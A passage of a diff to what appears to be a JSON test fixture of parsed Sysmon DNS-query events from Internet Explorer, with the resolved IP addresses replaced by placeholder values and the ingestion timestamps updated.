Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eum.simpli.fi\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -16320,11 +16140,11 @@ }, "answers": [ { - "data": "35.186.236.204", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -16332,7 +16152,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -16340,7 +16160,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -16348,7 +16168,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -16356,7 +16176,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -16365,16 +16185,16 @@ } ], "resolved_ip": [ - "35.186.236.204", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, @@ -16390,23 +16210,23 @@ "mpp.vindicosuite.com" ], "ip": [ - "35.186.236.204", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313946362Z", + "ingested": "2021-12-09T13:49:44.739871800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054444800Z'/\u003e\u003cEventRecordID\u003e181\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.955\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003empp.vindicosuite.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.186.236.204;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054444800Z'/\u003e\u003cEventRecordID\u003e181\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.955\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003empp.vindicosuite.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -16466,12 +16286,12 @@ }, "answers": [ { - "data": "8.41.222.152", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "8.41.222.152" + "89.160.20.156" ] }, "network": { @@ -16486,13 +16306,13 @@ "sync.1rx.io" ], "ip": [ - "8.41.222.152" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313947627Z", + "ingested": "2021-12-09T13:49:44.739877800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054454600Z'/\u003e\u003cEventRecordID\u003e182\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.955\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.1rx.io\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:8.41.222.152;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054454600Z'/\u003e\u003cEventRecordID\u003e182\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.955\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.1rx.io\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -16560,12 +16380,12 @@ "type": "CNAME" }, { - "data": "23.52.160.7", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.160.7" + "89.160.20.156" ] }, "network": { @@ -16582,13 +16402,13 @@ "sync.teads.tv" ], "ip": [ - "23.52.160.7" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313948951Z", + "ingested": "2021-12-09T13:49:44.739883500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054464900Z'/\u003e\u003cEventRecordID\u003e183\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.956\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.teads.tv\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sync.teads.tv.edgekey.net;type: 5 e9957.g.akamaiedge.net;::ffff:23.52.160.7;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054464900Z'/\u003e\u003cEventRecordID\u003e183\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.956\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.teads.tv\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sync.teads.tv.edgekey.net;type: 5 e9957.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -16652,23 +16472,23 @@ "type": "CNAME" }, { - "data": "3.15.109.176", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.15.225.252", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.18.121.79", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.15.101.187", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -16676,7 +16496,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -16684,7 +16504,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -16692,22 +16512,22 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" } ], "resolved_ip": [ - "3.15.109.176", - "52.15.225.252", - "3.18.121.79", - "3.15.101.187", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "network": { @@ -16723,23 +16543,20 @@ "s.thebrighttag.com" ], "ip": [ - "3.15.109.176", - "52.15.225.252", - "3.18.121.79", - "3.15.101.187", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313950325Z", + "ingested": "2021-12-09T13:49:44.739890900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054482800Z'/\u003e\u003cEventRecordID\u003e184\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.019\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003es.thebrighttag.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 td.thebrighttag.com;::ffff:3.15.109.176;::ffff:52.15.225.252;::ffff:3.18.121.79;::ffff:3.15.101.187;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054482800Z'/\u003e\u003cEventRecordID\u003e184\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.019\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003es.thebrighttag.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 td.thebrighttag.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -16803,12 +16620,12 @@ "type": "CNAME" }, { - "data": "54.192.55.189", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "54.192.55.189" + "89.160.20.156" ] }, "network": { @@ -16824,13 +16641,13 @@ "t.a3cloud.net" ], "ip": [ - "54.192.55.189" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313951700Z", + "ingested": "2021-12-09T13:49:44.739897300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053883400Z'/\u003e\u003cEventRecordID\u003e186\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.050\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003et.a3cloud.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 d386jaag4hn9zl.cloudfront.net;::ffff:54.192.55.189;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053883400Z'/\u003e\u003cEventRecordID\u003e186\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.050\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003et.a3cloud.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 d386jaag4hn9zl.cloudfront.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.053Z", @@ -16898,12 +16715,12 @@ "type": "CNAME" }, { - "data": "204.154.111.122", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "network": { @@ -16920,13 +16737,13 @@ "tps618.doubleverify.com" ], "ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313952979Z", + "ingested": "2021-12-09T13:49:44.739903200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053900700Z'/\u003e\u003cEventRecordID\u003e187\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.070\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps618.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053900700Z'/\u003e\u003cEventRecordID\u003e187\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.070\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps618.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.053Z", @@ -16998,52 +16815,52 @@ "type": "CNAME" }, { - "data": "54.157.69.185", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.209.139.81", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.233.36.36", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.54.198.81", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.55.201.28", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.210.34.44", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.72.163.149", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.232.198.130", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" } ], "resolved_ip": [ - "54.157.69.185", - "18.209.139.81", - "18.233.36.36", - "52.54.198.81", - "52.55.201.28", - "18.210.34.44", - "52.72.163.149", - "18.232.198.130", - "192.5.6.30" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30" ] }, "network": { @@ -17061,21 +16878,14 @@ "dpm.demdex.net" ], "ip": [ - "54.157.69.185", - "18.209.139.81", - "18.233.36.36", - "52.54.198.81", - "52.55.201.28", - "18.210.34.44", - "52.72.163.149", - "18.232.198.130", - "192.5.6.30" + "89.160.20.156", + "192.168.6.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313954250Z", + "ingested": "2021-12-09T13:49:44.739908900Z", "code": "22", - "original": "\u003cEvent 